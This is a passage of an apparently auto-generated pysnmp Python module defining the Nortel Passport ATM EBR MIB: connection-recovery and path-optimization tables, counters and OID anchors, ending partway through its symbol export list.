mscAtmIfVptVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoIndex.setStatus('mandatory')
# Operational table: read-only no(0)/yes(1) flags for subscription state and
# whether this connection has been recovered.
mscAtmIfVptVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVptVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoConnectionRecovered.setStatus('mandatory')
# Statistics table: read-only lifetime counters.
mscAtmIfVptVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40), )
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVptVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVptVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVptVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVptVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 20, 12, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVptVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
# --- mscAtmIfPnniEbr: EBR component directly under AtmIf/Pnni (no Vpt level) ---
# Rooted at ...114, 96, 7; note the shorter index (no mscAtmIfVptIndex).
# Same generated layout: RowStatus (1), Prov (20), Oper (30), Stats (40).
mscAtmIfPnniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7))
# RowStatus table: row lifecycle plus name / storage-type / index columns.
mscAtmIfPnniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfPnniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfPnniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrRowStatus.setStatus('mandatory')
mscAtmIfPnniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrComponentName.setStatus('mandatory')
mscAtmIfPnniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrStorageType.setStatus('mandatory')
mscAtmIfPnniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfPnniEbrIndex.setStatus('mandatory')
# Provisioning table: read-write recovery / path-optimization bitmasks.
mscAtmIfPnniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrProvTable.setStatus('mandatory')
mscAtmIfPnniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrProvEntry.setStatus('mandatory')
mscAtmIfPnniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfPnniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfPnniEbrPathOptimization.setStatus('mandatory')
# Operational table: read-only connection gauges.
mscAtmIfPnniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrOperTable.setStatus('mandatory')
mscAtmIfPnniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrOperEntry.setStatus('mandatory')
mscAtmIfPnniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfPnniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfPnniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrIneligibleRecoveredConnections.setStatus('mandatory')
# Statistics table: read-only lifetime counters.
mscAtmIfPnniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfPnniEbrStatsTable.setStatus('mandatory')
mscAtmIfPnniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfPnniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfPnniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfPnniEbrStatsEntry.setStatus('mandatory')
mscAtmIfPnniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfPnniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')
# --- Conformance/agent-capability OID anchors for this MIB ---
# Bare MibIdentifier nodes under ...562, 36, 2, 2, 159 (group subtree 1,
# capabilities subtree 3); CA02 / CA02A look like versioned revisions —
# presumably Nortel capability releases, verify against the source MIB.
atmEbrGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1))
atmEbrGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1))
atmEbrGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3))
atmEbrGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3, 2))
atmEbrCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3))
atmEbrCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1))
atmEbrCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1, 3))
atmEbrCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1, 3, 2))
mibBuilder.exportSymbols("Nortel-MsCarrier-MscPassport-AtmEbrMIB", mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA, mscAtmIfUniEbrTotalConnectionRecoveries=mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=mscAtmIfVptPnniEbrProvEntry, mscAtmIfVptVccEbrInfoTotalPathOptimizations=mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup, mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery, mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry, mscAtmIfVptUniEbrTotalPathOptimizations=mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr, mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization, mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry, mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType, mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus, mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable, mscAtmIfVptPnniEbrSubscribedConnections=mscAtmIfVptPnniEbrSubscribedConnections, mscAtmIfVccEbrInfoTotalPathOptimizations=mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=mscAtmIfVptUniEbrProvEntry, mscAtmIfVptPnniEbrEligibleRecoveredConnections=mscAtmIfVptPnniEbrEligibleRecoveredConnections, mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName, mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry, mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex, mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType, mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable, mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization, mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry, mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry, 
mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType, mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry, mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex, mscAtmIfPnniEbrTotalConnectionRecoveries=mscAtmIfPnniEbrTotalConnectionRecoveries, mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable, mscAtmIfPnniEbrEligibleRecoveredConnections=mscAtmIfPnniEbrEligibleRecoveredConnections, mscAtmIfVpcEbrInfoRecoverySubscribed=mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=mscAtmIfVptVccSrcEbrOvProvTable, mscAtmIfVptVccEbrInfoConnectionRecovered=mscAtmIfVptVccEbrInfoConnectionRecovered, mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName, mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName, mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry, mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName, mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry, mscAtmIfVptIispEbrTotalPathOptimizations=mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex, mscAtmIfVptUniEbrIneligibleRecoveredConnections=mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02=atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=mscAtmIfVptVccEbrInfoRowStatusTable, mscAtmIfVptIispEbrProvTable=mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=mscAtmIfVpcSrcEbrOvOptimizationSubscribed, mscAtmIfIispEbrTotalPathOptimizations=mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName=mscAtmIfVccSrcEbrOvComponentName, mscAtmIfVccSrcEbrOvOptimizationSubscribed=mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=mscAtmIfIispEbrStatsTable, 
mscAtmIfUniEbrSubscribedConnections=mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=mscAtmIfIispEbrRowStatusEntry, mscAtmIfVptIispEbrIneligibleRecoveredConnections=mscAtmIfVptIispEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A, mscAtmIfVptVccEbrInfoOptimizationSubscribed=mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=mscAtmIfPnniEbrIneligibleRecoveredConnections, mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable, mscAtmIfVptPnniEbrIneligibleRecoveredConnections=mscAtmIfVptPnniEbrIneligibleRecoveredConnections, mscAtmIfVpcEbrInfoConnectionRecovered=mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations=mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=mscAtmIfVccSrcEbrOvRowStatusTable, 
mscAtmIfIispEbrConnectionRecovery=mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex, mscAtmIfVptUniEbrTotalConnectionRecoveries=mscAtmIfVptUniEbrTotalConnectionRecoveries, mscAtmIfVpcEbrInfoTotalConnectionRecoveries=mscAtmIfVpcEbrInfoTotalConnectionRecoveries, mscAtmIfVptVccSrcEbrOvRowStatusEntry=mscAtmIfVptVccSrcEbrOvRowStatusEntry, mscAtmIfIispEbrTotalConnectionRecoveries=mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=mscAtmIfVptIispEbrEligibleRecoveredConnections, mscAtmIfUniEbrProvEntry=mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr, mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry, 
mscAtmIfVptPnniEbrTotalConnectionRecoveries=mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=mscAtmIfVptVccSrcEbrOvComponentName, mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery, mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType, mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv, mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable, mscAtmIfUniEbrEligibleRecoveredConnections=mscAtmIfUniEbrEligibleRecoveredConnections, mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry, mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus, mscAtmIfIispEbrEligibleRecoveredConnections=mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=mscAtmIfVptPnniEbrStatsTable, 
mscAtmIfVptUniEbrSubscribedConnections=mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=mscAtmIfPnniEbrConnectionRecovery, mscAtmIfVccEbrInfoConnectionRecovered=mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=mscAtmIfVccEbrInfoStatsEntry, mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=mscAtmIfVptVccEbrInfoTotalConnectionRecoveries, mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType, mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry, mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable, mscAtmIfVccSrcEbrOvRecoverySubscribed=mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=atmEbrCapabilities, mscAtmIfUniEbrComponentName=mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=mscAtmIfPnniEbrTotalPathOptimizations, mscAtmIfUniEbrIneligibleRecoveredConnections=mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=mscAtmIfVptVccSrcEbrOvProvEntry, mscAtmIfVccEbrInfoOperTable=mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A, mscAtmIfVccEbrInfoOptimizationSubscribed=mscAtmIfVccEbrInfoOptimizationSubscribed, mscAtmIfVptVccSrcEbrOvRowStatusTable=mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB, mscAtmIfVptVccEbrInfoRecoverySubscribed=mscAtmIfVptVccEbrInfoRecoverySubscribed, mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry, mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus, mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry, mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType, mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry, 
mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable, mscAtmIfIispEbrIneligibleRecoveredConnections=mscAtmIfIispEbrIneligibleRecoveredConnections, mscAtmIfVptIispEbrConnectionRecovery=mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02, mscAtmIfVptIispEbrTotalConnectionRecoveries=mscAtmIfVptIispEbrTotalConnectionRecoveries, mscAtmIfUniEbrTotalPathOptimizations=mscAtmIfUniEbrTotalPathOptimizations, mscAtmIfVpcSrcEbrOvRecoverySubscribed=mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=mscAtmIfVptPnniEbrOperTable, mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=mscAtmIfVptVccSrcEbrOvOptimizationSubscribed, mscAtmIfVptUniEbrEligibleRecoveredConnections=mscAtmIfVptUniEbrEligibleRecoveredConnections, mscAtmIfVpcEbrInfoOptimizationSubscribed=mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=mscAtmIfVptVccSrcEbrOvStorageType, 